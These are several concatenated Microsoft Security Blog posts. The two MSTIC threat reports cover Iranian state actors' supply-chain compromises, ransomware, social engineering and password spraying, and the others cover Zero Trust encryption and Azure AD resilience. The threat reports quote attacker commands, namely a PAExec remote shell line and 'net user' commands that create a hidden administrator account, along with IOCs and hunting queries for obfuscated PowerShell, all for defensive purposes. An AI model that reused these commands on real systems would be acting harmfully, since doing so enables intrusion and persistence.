As with any observed nation state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

Observed activity

In July 2021, a group that MSTIC tracks as DEV-0228 and assesses as based in Iran compromised a single Israel-based IT company that provides business management software. Based on MSTIC’s assessment, DEV-0228 used access to that IT company to extend their attacks and compromise downstream customers in the defense, energy, and legal sectors in Israel. In September, we detected a separate Iranian group, DEV-0056, compromising email accounts at a Bahrain-based IT integration company that works on IT integration with Bahrain Government clients, who were likely DEV-0056’s ultimate target. DEV-0056 also compromised various accounts at a partially government-owned organization in the Middle East that provide information and communications technology to the defense and transportation sectors, which are targets of interest to the Iranian regime. DEV-0056 maintained persistence at the IT integration organization through at least October.

MSTIC detected a significant increase in these and other Iranian groups targeting IT companies based in India beginning in mid-August. From mid-August to late September, we issued 1,788 nation state notifications (NSNs) across Iranian actors to enterprise customers in India, roughly 80% of which were to IT companies, an exponential rise from the 10 notifications we issued the previous three years in response to previous Iranian targeting. Iranian cyber actors have rarely targeted India, and the lack of pressing geopolitical issues that would have prompted such a shift suggests that this targeting is for indirect access to subsidiaries and clients outside India.

Credential theft leads to downstream compromise

DEV-0228 dumped credentials from the on-premises network of an IT provider based in Israel in early July. Over the next two months, the group compromised at least a dozen other organizations, several of which have strong public relations with the compromised IT company. MSTIC assesses at least four (4) of those victims were compromised using the acquired credentials and access from the IT company in the July and August attacks. Here are two such examples:

  • DEV-0228 operators compromised the on-premises network of a law firm in Israel in August through an account managed by the IT provider via PAExec (a custom version of the Windows Sysinternals tool PsExec).

Pa.exe  \\###.##.#.## -u {user name}\{domain name} -p "********" -s cmd.exe

  • DEV-0228 operators also compromised a defense company in Israel by signing into an email account provisioned for the same IT provider on the victim’s Office 365 tenant. The attackers likely obtained those credentials from the initial compromise of the IT provider in July.

Custom implant to establish persistence

DEV-0228 operators used a custom implant to establish persistence on victim hosts and then dumped LSASS. The implant is a custom remote access Trojan (RAT) that uses Dropbox as a command and control (C2) channel and is disguised as RuntimeBroker.exe or svchost.exe.

Operators staged their tools in a C:\Windows\TAPI directory on the victim hosts:

  • C:\Windows\TAPI\lsa.exe
  • C:\Windows\TAPI\pa.exe
  • C:\Windows\TAPI\pc.exe (procdump)
  • C:\Windows\TAPI\Rar.exe

Microsoft will continue to monitor DEV-0228 and DEV-0056 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.

Indicators of compromise (IOCs)

Type Indicator
svchost.exe 2a1044e9e6e87a032f80c6d9ea6ae61bbbb053c0a21b186ecb3b812b49eb03b7
svchost.exe 9ab7e99ed84f94a7b6409b87e56dc6e1143b05034a5e4455e8c555dbbcd0d2dd
lsa.exe 43109fbe8b752f7a9076eaafa417d9ae5c6e827cd5374b866672263fdebd5ec3
wdmsvc.exe 18a072ccfab239e140d8f682e2874e8ff19d94311fc8bb9564043d3e0deda54b
Pa.exe (PAExec.exe) ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

Recommended defenses

The following guidance can mitigate the techniques described in the threat activity:

Detections

Microsoft 365 Defender

Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

  • Backdoor:MSIL/ShellClient.A
  • Backdoor:MSIL/ShellClient.A!dll
  • Trojan:MSIL/Mimikatz.BA!MTB

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate threat activity on the network:

  • DEV-0228 actor activity
  • DEV-0056 actor activity

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity, but they are listed here for reference:

  • Suspicious connection to remote service
  • Possible command-and-control activity
  • Suspicious access to LSASS service
  • Sensitive credential memory read

Screenshot of Microsoft 365 Defender alert for Sensitive credential memory read

Figure 3: Microsoft 365 Defender alert showing credential dumping activity

Microsoft 365 Defender correlates related alerts into consolidated incidents to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to the activity described in this blog.

Advanced hunting queries

Microsoft Sentinel

The indicators of compromise (IoCs) included in this blog post can be used by Microsoft Sentinel customers for detection purposes using the queries detailed below.

Command Line Activity November 2021

This hunting query looks for process command line activity related to observed activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.

https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0056CommandLineActivityNovember2021.yaml

FilePath/Hashes query November 2021

This hunting query looks for file paths/hashes related to observed activity as detailed in this blog.

https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/Dev-0228FilePathHashesNovember2021.yaml

In addition to these queries, there are equivalent queries that use the Advanced SIEM Information Model (ASIM) to look for the same activity.

https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/ASimProcess/imProcess_Dev-0056CommandLineActivityNovember2021-ASIM.yaml

https://github.com/Azure/Azure-Sentinel/tree/master/Detections/ASimFileEvent/imFileEvent_Dev-0228FilePathHashesNovember2021-ASIM.yaml

Microsoft 365 Defender

To locate malicious activity related to the activity described in this blog, customers can run the following queries in Microsoft 365 Defender or Microsoft Defender for Endpoint.

Identify use of PAExec in your environment

Look for PAExec.exe process executions in your environment. Run query.

DeviceProcessEvents
| where FileName =~ "paexec.exe" or ProcessVersionInfoOriginalFileName =~ "paexec.exe"
| where not(ProcessCommandLine has_any("program files", "-service"))

Identify files created in the Windows\Tapi directory

Look for files created in the Windows\Tapi directory. Run query.

DeviceFileEvents
| where FolderPath has @"C:\Windows\TAPI"

Suspicious PowerShell commands

Look for suspicious PowerShell process execution. Run query.

DeviceProcessEvents
| where ProcessCommandLine has_any("/q /c color f7&", "Net.We$()bClient", "$b,15,$b.Length-15") or
(ProcessCommandLine has "FromBase64String" and ProcessCommandLine has_all("-nop", "iex", "(iex"))

The post Iranian targeting of IT sector on the rise appeared first on Microsoft Security Blog.

Adopting a Zero Trust approach throughout the lifecycle of data

November 17th, 2021 No comments

Instead of believing everything behind the corporate firewall is safe, the Zero Trust model assumes breach and verifies each request as though it originates from an uncontrolled network. Regardless of where the request originates or what resource it accesses, Zero Trust teaches us to “never trust, always verify.”

At Microsoft, we consider Zero Trust an essential component of any organization’s security plan based on these three principles:

  1. Verify explicitly: Always authenticate and authorize based on all available data points, including user identity, location, device health, service or workload, data classification, and anomalies.
  2. Use least privileged access: Limit user access with just-in-time (JIT) and just-enough-access (JEA), risk-based adaptive policies, and data protection to protect both data and productivity.
  3. Assume breach: Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.

In this article, we will focus on the third principle (assume breach) and how encryption and data protection play a significant role in getting prepared for a potential breach in your data center.

Protect data with end-to-end encryption

As part of a comprehensive security posture, data should always be encrypted so that in the event where an attacker is able to intercept customer data, they are unable to decipher usable information.

End-to-end encryption is applied throughout the following three stages: at rest, in transit, and in use.

Three icons representing data at rest, in transit, and in use.

Data protection is critical across all three of these stages, so let’s dive a little deeper into how each stage works and how it can be implemented.

Protect data at rest

Encryption at rest provides data protection for stored data (at rest). Attacks against data at rest include attempts to obtain physical access to the hardware on which the data is stored, and then compromising the contained data. In such an attack, a server’s hard drive may have been mishandled during maintenance allowing an attacker to remove the hard drive. Later the attacker would put the hard drive into a computer under their control to attempt to access the data.

Encryption at rest is designed to prevent the attacker from accessing the unencrypted data by ensuring the data is encrypted when on disk. If an attacker obtains a hard drive with encrypted data but not the encryption keys, the attacker must defeat the encryption to read the data. This attack is much more complex and resource-consuming than accessing unencrypted data on a hard drive. For this reason, encryption at rest is highly recommended and is a high priority requirement for many organizations.

Flow chart of Microsoft Azure Key Vault encryption process.

At rest, it is important that your data is protected through disk encryption which enables IT administrators to encrypt your entire virtual machine (VM) or operating system (OS) disks.

One of the concerns that we hear from customers is how can they reduce the chances that certificates, passwords, and other secrets may accidentally get leaked. A best practice is to use central storage of application secrets in a secured vault to have full control of their distribution. When using a secured vault, application developers no longer need to store security information in their applications, which reduces risk by eliminating the need to make this information part of the code.

Data encryption at rest is a mandatory step toward data privacy, compliance, and data sovereignty. These Microsoft Azure security services are recommended for this purpose:

  • Azure Storage Service Encryption: Microsoft Azure Storage uses server-side encryption (SSE) to automatically encrypt your data when it is persisted to the cloud. Azure Storage encryption protects your data to help you to meet your organizational security and compliance commitments.
  • SQL Server Transparent Database Encryption (TDE): Encryption of a database file is done at the page level with Transparent Data Encryption. The pages in an encrypted database are encrypted before they’re written to disk and are decrypted when read into memory.
  • Secrets management: Microsoft Azure Key Vault can be used to securely store and tightly control access to tokens, passwords, certificates, API keys, and other secrets.
  • Key management: Azure Key Vault can also be used as a key management solution. Azure Key Vault makes it easy to create and control the encryption keys used to encrypt your data.
  • Certificate management: Azure Key Vault lets you easily provision, manage, and deploy public and private Secure Sockets Layer/Transport Layer Security (SSL/TLS) certificates for use with Azure and your internal connected resources.
  • Hardware security modules (HSM): Store and protect your secrets and keys either by software or FIPS 140-2 Level 2, which validates HSMs.

Protect data in transit

A “data in transit” condition exists when data is transferred within the data center between different network elements or data centers.

Organizations that fail to protect data in transit are more susceptible to man-in-the-middle attacks, eavesdropping, and session hijacking. These attacks can be the first step attackers use to gain access to confidential data.

For example, the recent NOBELIUM cyberattacks show that no one can be 100 percent protected against a breach. During this attack, 18,000 SolarWinds customers were vulnerable, including Fortune 500 companies and multiple agencies in the US government.

Data in transit should cover two independent encryption mechanisms:

  1. Application layer—the HTTPS and TLS encryption that takes place between the client and server node.
  2. Data link layer—encryption that takes place on the frames transferred over the Ethernet protocol, just above the physical connections

It is recommended customers not only encrypt data on the application layer but also have visibility into their data in transit by using TLS inspection capabilities.

These Microsoft Azure network security services are recommended for this purpose:

As part of the TLS inspection, the above network services perform full decryption and encryption of the traverse, add such as intrusion detection and prevention system (IDPS), as well as provide customers with visibility into the data itself.

To provide customers double encryption when sending data between regions, Azure provides data link layer encryption utilizing media access control security (MACSec).

MACSec is a vendor-independent IEEE Standard (802.1ae), which provides data link layer, point-to-point encryption of traffic between network devices. The packets are encrypted/decrypted on the hardware before being sent and are designed to prevent even a physical “man-in-middle” attack. Because MACSec uses line rate encryption, it can secure data without the performance overhead and complexity of IP encryption technologies such as IPSec/GRE.

Data in transit is encrypted on the wire to block physical man-in-the-middle attacks.

Whenever Azure customer traffic moves between Azure datacenters—outside physical boundaries not controlled by Microsoft (or on behalf of Microsoft)—a data link layer encryption method using the IEEE 802.1AE MAC Security Standards is applied from point-to-point across the underlying network hardware. The packets are encrypted and decrypted on the devices before being sent and applied by default for all Azure traffic traveling within a region or between regions.

Protect data in use

We often hear from customers that they are concerned about moving extremely sensitive IP and data to the cloud. To effectively protect assets, not only must data be secured at rest and in transit, but data must also be protected from threats while in use.

To protect data in use for services across your software-as-a-service (SaaS), platform-as-a-service (PaaS), and infrastructure-as-a-service (IaaS) cloud models, we offer two important capabilities: Azure confidential computing and centralized storage of application secrets.

Azure confidential computing encrypts data in memory in hardware-based trusted execution environments (TEEs) and only processes it once the cloud environment is verified, preventing data access from cloud operators, malicious admins, and privileged software such as the hypervisor. By protecting data in use, organizations can achieve the highest levels of data privacy and enable secure multi-party data analytics, without giving access to their data.

These Azure services are recommended to be used for ‘data in use’ protection:

  1. Application Enclaves: You can optimize for confidentiality at the application level by customizing your app to run in confidential VMs with Intel SGX application enclaves, or lift and shift existing applications using an ISV partner.
  2. Confidential VMs: You can optimize for ease of use by moving your existing workloads to Azure and making them confidential without changing any code by leveraging encryption across the entire VM with AMD SEV-SNP technologies
  3. Trusted Launch: Trusted Launch with Secure boot and vTPMs ensure your virtual machines boot with legitimate code, helping you protect against advanced and persistent attack techniques such as rootkits and bootkits.
  4. Confidential Containers: AKS worker nodes are available on confidential computing VMs, allowing you to secure your containers with encrypted memory.
  5. Confidential Services: We are continuing to onboard Azure confidential services to leverage within your solutions, now supporting – Azure confidential ledger in preview, Azure SQL Always Encrypted, Azure Key Vault Managed HSM, and Microsoft Azure Attestation, all running on Azure confidential computing.

Strengthening your organization’s data protection posture

Protecting your data throughout its lifecycle and wherever it resides or travels is the most critical step to safeguard your business data.

To learn more about the end-to-end implementation of data protection as a critical part of your Zero Trust strategy, visit our Deployment Center.

To see how your organization’s data security posture stacks up against the Zero Trust maturity model, take this interactive quiz.

For more information about a Zero Trust security posture, visit the Microsoft Zero Trust website.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Adopting a Zero Trust approach throughout the lifecycle of data appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

The importance of identity and Microsoft Azure Active Directory resilience

November 16th, 2021 No comments

I love hearing my colleagues explain how they came to the industry because so many of their stories are unusual. I’m surprised how often I hear that people got into computer science by some fortuitous accident. Although he loved computers from the time he was a kid, Oren Melzer never expected to work in the software industry. Today, he’s a Principal Group Engineering Manager in the Identity and Network Access organization, working on one of our team’s most important efforts: resilience.

When he was growing up, Oren’s business-minded parents encouraged him to develop an entrepreneurial spirit. And he did. Oren’s journey reminds us that entrepreneurship isn’t limited to building a new business from scratch, where you start off doing everything yourself. Even though he’s worked in a large organization in a large company for the past several years, Oren has enjoyed participating in many entrepreneurial efforts, including his groundbreaking work on making cloud services resilient, as he tells Nadim Abdo, Corporate Vice President of Identity and Network Access Engineering.

Oren’s interview with Nadim has been edited for clarity and length. We’ve included some video snippets so you can learn more about Oren’s personal journey and his views on the work he does.

Nadim: Oren, I’d like to start by asking what got you into the industry and computers?

Oren: It all started when I was really young. My parents were immigrants from Israel to Louisville, Kentucky. Not a ton of Israelis in Kentucky! My dad was an engineer, so we had computers super early. I’m dating myself, but we had a Commodore that ran Microsoft Disk Operating System (MS-DOS). I was probably five or six, tinkering around on that thing. When my dad showed me Quick Basic interpreter (QBasic), I created a simple little program that would ask, “What is your name?” And you’d say, “Oren.” And it would say, “Hello, Oren.” I remember thinking, “That’s the coolest thing in the world. I can make a computer program that I can talk to!” I loved doing stuff on computers from then on.

Nadim: I have fond memories of QBasic as well. That integrated development environment (IDE) and debugger were pretty awesome. So, you wrote programs from an early age—do you remember any other programs you did?

Oren: Three months after I was born, my parents started a food manufacturing company, which they still run. It’s a family business, so after a few years, they put me to work. But they realized pretty quickly that this computer thing was probably more useful than me putting cans in boxes. So, I became the company computer guy.

They had software to do all their accounting and inventory, and there was a production planning module that cost $40,000. They asked me what I thought, and I said that, with what I knew, I could write it for a lot less money. I was a high schooler, and they basically threw me into this problem. I didn’t have anybody to tell me what to do or how to do it. I wrote a bunch of Visual Basic macros that pulled data from the system, pulled up some editable forms, and then popped out a production plan. That was an entire summer project, 20-plus years ago, and their company still runs on that software to this day. I actually still get tech support calls to fix random bugs.

Nadim: That’s amazing! You must’ve learned the value of customer obsession from that experience. And obviously, this segues to how you now work on some of the most critical services in the entire industry. What learnings from that experience really carried through?

Oren: First, you have to build something that works. I wrote this software when I was 16 or 17 years old, and if it breaks, they can’t produce—30 or 40 people on a factory floor don’t know what to run or they’re scrambling to try to do the same thing manually.

I didn’t know about source control then, but I learned early on to make a backup copy when making changes. If something broke, I’d copy in the one from yesterday that worked. And there’d be weird edge cases, like some new item that the string was too long to fit into how many characters I assumed it could be. So, I learned to be very fault-tolerant, catch errors, and keep on going.

Nadim: When you went to college, what did you choose as your focus? 

Oren: I was convinced that software was something everybody was doing. And I like to do things that other people aren’t doing. So, I went into college as a biomedical engineering major. I really wanted to combine the computer thing with biology, another passion I had in high school. I wanted to build medical devices and software for medical devices, pacemakers, and so forth.

A couple of things got me into software. Early on, I met another computer science major, and he became a good friend. He’s actually at Microsoft now. We started a book business together, which we wrote software for.

Video 1: Oren talks about the book business he started in college with a friend.

For a while, I actually thought this thing could be my career, but during our downtime one summer, I looked for a biomedical internship. I couldn’t find one, but who showed up at our company fair? Microsoft. I had my first internship in the identity organization after that. I loved it so much I changed my major. I ended up getting a master’s in computer science and came to Microsoft full-time. I’ve been in identity ever since.

Nadim: That’s wonderful! What do you like best about working in the identity space?

Oren: What’s cool about identity is how foundational it is, like the electric company. Very few people wake up in the morning and say, “I want to use my identity today.” But whatever you do want to do—when you look at all the Microsoft products and applications at any number of businesses—the very first question you always need to ask is, who are you? What is your identity?

Identity enables all those experiences. And when it doesn’t work, people can’t work. I tell people, “I challenge you to find another job where you can impact more people in a day than our identity system does.” We throw around numbers like “billions of authentications” like it’s nothing. That level of impact—that level of making a difference for practically every working person, and many people in college, all over the world—is practically unmatched anywhere else at Microsoft or in the industry, as far as I know.

Nadim: That’s right. The scale is certainly incredible, as is the criticality and security. With that kind of scale, there are obviously enormous technical challenges. And you’ve worked on a number of different areas within identity, right?

Oren: I started on a product called Windows CardSpace, formerly known as InfoCard. It was an identity selector in Windows, where somebody could issue you an identity to use online. To some extent, we were ahead of our time, and eventually, that project was shelved. I moved to developer frameworks and worked on Windows Identity Foundation, which became part of the Microsoft .NET Framework. I also worked on Active Directory Federation Services (AD FS).

My first entry into cloud services was the Access Control Service, which allowed admins to configure federated authentication for their apps. You could authenticate using Microsoft accounts and Google accounts and also secure your application. It was one of the identity organization’s first modern services. And it was really interesting to move from shipping software in a box, which people can download or not, to shipping something that runs all the time and is critical to day-to-day life.

Nadim: And certainly, an absolutely critical journey as part of cloud transformation with everybody using these services. Tell me about your role and what you like best about it?

Oren: I now own an area called “authentication resilience” in identity. We could build the best services in the world, with the most features, but if they’re not up all day, every day, we’re basically failing our customers. And the impact of that is enormous. We’ve learned hard lessons over the years on what can go wrong in a distributed system, so we’ve developed systems that enable us to operate, and continue to operate, in case all kinds of outages occur, whether from networking problems somewhere in Microsoft Azure, a bug that gets released in our system, or key management problems.

We’re building, number one, a set of components to ensure that if the core identity system goes down, users won’t notice. We do that by allowing sessions to live longer, while also being more secure, and to react in real-time. Secondly, we built an entire decorrelated backup authentication stack where we can continue to serve authentications even if the primary system goes down completely. The vast majority of users can stay productive and have no idea that anything has gone wrong.

The goal is to prevent the outage from happening, but if a partial outage does occur, to minimize the impact.

Video 2: Oren describes his job to his parents.

Nadim: How would you say that Microsoft is differentiating our offerings in terms of resilience?

Oren: When we started on this resilience journey a couple of years ago, we weren’t aware of any cross-industry efforts on service resilience. Existing identity standards just assume everything is going to work. With OAuth and security assertion markup language (SAML), you make a request, you get a response. There was no playbook or roadmap for figuring out how to build the next level of real-time signals, more resilience, or backup systems. We weren’t going to wait for one, so we just built it. Ultimately, a working group formed in the OpenID Foundation called Shared Signals and Events, and we actively participated. I went to many of those early meetings, trying to figure out how to build a real-time resilient identity system.

It’s one thing to talk about theory. It’s another to say, “We’ve built this already. Here’s what it looks like.” As a big believer in open standards, I’m proud that we didn’t just say, “The standard must be exactly like what we built, otherwise we’re not going to be on it.” We have actually adapted our implementation to the industry standard. And we’ve been able to get our partners elsewhere in the industry—people who build other software that works with Microsoft Azure Active Directory (Azure AD)—to adopt this standard as well. Now we can say that we have resilience and continuous access, not just for Microsoft properties, but also for many other long-tail apps, built by other people, that we know our customers rely on every day.

Nadim: One of the things that’s awesome about our team is we have so many different individuals with so much talent, with different interests, passions, and ways of looking at the world. How would you describe yourself, your approach, and your strengths?

Oren: People think of software engineers hunched over in a dark room in front of a desk, pounding on a keyboard, looking at ones and zeros on a screen. I like code as much as anybody, but I am a people person. I really thrive on human interaction, on enabling somebody to be successful, and on finding the right project for someone working for me who may be struggling a bit.

The same is true when I think about the impact of the software we build. I don’t just think about the billion requests our backup systems serve today. I think about a billion people who might’ve been frustrated because they couldn’t check their email. And now they can because this backup system kicked in. What motivates me is the people—both the ones I can see in the office and the ones I can’t see. I know they’re there. Knowing that the work I do can make a difference for those people, both in terms of the technology I build and of the people I manage, is extremely motivational for me.

Video 3: Oren shares what he likes best about his job.

Learn more

Learn more about cloud resilience.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The importance of identity and Microsoft Azure Active Directory resilience appeared first on Microsoft Security Blog.

Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021

November 16th, 2021 No comments

Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At CyberWarCon 2021, MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled “The Iranian evolution: Observed changes in Iranian malicious network operations”. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC’s ongoing efforts to track these actors and protect customers from the related threats.

MSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.

As with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

Three notable trends in Iranian nation-state operators have emerged:

  • They are increasingly utilizing ransomware to either collect funds or disrupt their targets.
  • They are more patient and persistent while engaging with their targets.
  • While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.

Ransomware

Since September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.

Timeline showing dates, threat actor, and malware payload of ransomware attacks by Iranian threat actors

Figure 1: Timeline of ransomware attacks by Iranian threat actors

In one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the DFIR Report describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.

Scan

In the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to CVE-2018-13379. This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065).

Exploit

When they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named MicrosoftOutLookUpdater.exe. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.

Review

After gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of “help” and password of “_AS_@1394” via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.

net user help _AS_@1394 /add
net localgroup administrators help /add
net localgroup "Remote Desktop Users" help /add

Stage and Ransom

Finally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.

Your drives are Encrypted! Contact us: Telegram: @badguy

Patience and persistence

MSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator’s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.

PHOSHORUS – Patient and persistent

PHOSPHORUS sends “interview requests” to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.

Once the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.

MSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.

CURIUM – In it for the long run

CURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.

These attackers have followed the following playbook:

  • Masquerade as an attractive woman on social media
  • Establish a connection via social media with a target user via LinkedIn, Facebook, etc.
  • Chat with the target daily
  • Send benign videos of the woman to the target to prime them to lower their guard
  • Send malicious files to the target similar the benign files previously sent
  • Request that the target user open the malicious document
  • Exfiltrate data from the victim machine

The process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.

By exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.

Brute force

In 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has blogged about DEV-0343 activity previously.

Analysis of Office 365 logs suggests that DEV-0343 is using a red team tool like o365spray to conduct these attacks.

Targeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.

As we discussed in our previous blog, DEV-0343 operators’ ‘pattern of life’ is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.

Bar chart showing activity per hour

Figure 2: DEV-0343 observed operating hours in UTC

Bar chart showing requests per day

Figure 3: DEV-0343 observed actor requests per day

Known DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.

Closing thoughts: Increasingly capable threat actors

As Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:

  • Information operations
  • Disruption and destruction
  • Support to physical operations

Specifically, Iranian operators have proven themselves to be both willing and able to:

  • Deploy ransomware
  • Deploy disk wipers
  • Deploy mobile malware
  • Conduct phishing attacks
  • Conduct password spray attacks
  • Conduct mass exploitation attacks
  • Conduct supply chain attacks
  • Cloak C2 communications behind legitimate cloud services

MSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.

 

The post Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021 appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

How Open Systems uses Microsoft tools to improve security maturity

November 15th, 2021 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog seriesLearn more about MISA.

We’ve all seen it happen—an organization has all the top-notch security tools in place and still, they get breached. In today’s rapidly evolving threat landscape, complexity leads to vulnerability. With so many tools to monitor, it’s easy for even the best security operations center (SOC) to get overwhelmed by non-actionable alerts1 and hampered by insufficient personnel to secure a growing digital estate. Research on “security tool sprawl” shows that, on average, organizations run 25 to 49 security tools from up to 10 different vendors.2 In a time of rising cyber attacks,3 the gaps left between mismatched or poorly implemented IT and security tools can make it impossible to establish a high-maturity security program.

Managed services to simplify security

Open Systems’ award-winning Managed Detection and Response (MDR) executes repeatable security missions that protect enterprises in real-time and levels up their security posture for tomorrow. The company’s customers are typically mid-market organizations—enterprise or small-to-medium corporations (SMC)—that are looking for all-day threat detection and response but also aspire to improve their security posture and resilience against attack. Open Systems noticed that many of these customers lean heavily on Microsoft for IT and cloud infrastructure, and can unlock the value of these investments to consolidate and operationalize their security tools. Open Systems accomplishes this by providing a Microsoft Azure cloud-native Managed Detection and Response (MDR) service built for Microsoft Sentinel (formerly known as Microsoft Azure Sentinel), Microsoft Security best practices, and Microsoft 365 E5 (M365 E5).

As a six-time Gold Partner, Open Systems enables Microsoft customers to get more insights from their Microsoft Security tools, and to better grasp their attack surface. The company’s use of Microsoft’s cloud native security information event management (SIEM) and security orchestration automated response (SOAR) capabilities help deliver stronger signal fidelity through machine learning threat modeling—delivering the actionable results Open Systems’ customers need to remain confident in their security every day. Even better, customers can often achieve this level of security using the Microsoft investments they’ve already made. And by integrating with Open Systems’ MDR, they get peace of mind by delegating detection and response to Microsoft-certified SOC analysts and threat hunters, helping contain threats early in the kill chain.

Open Systems’ MDR integration with Microsoft.

Figure 1: Open Systems’ MDR integration with Microsoft.

Open Systems’ approach

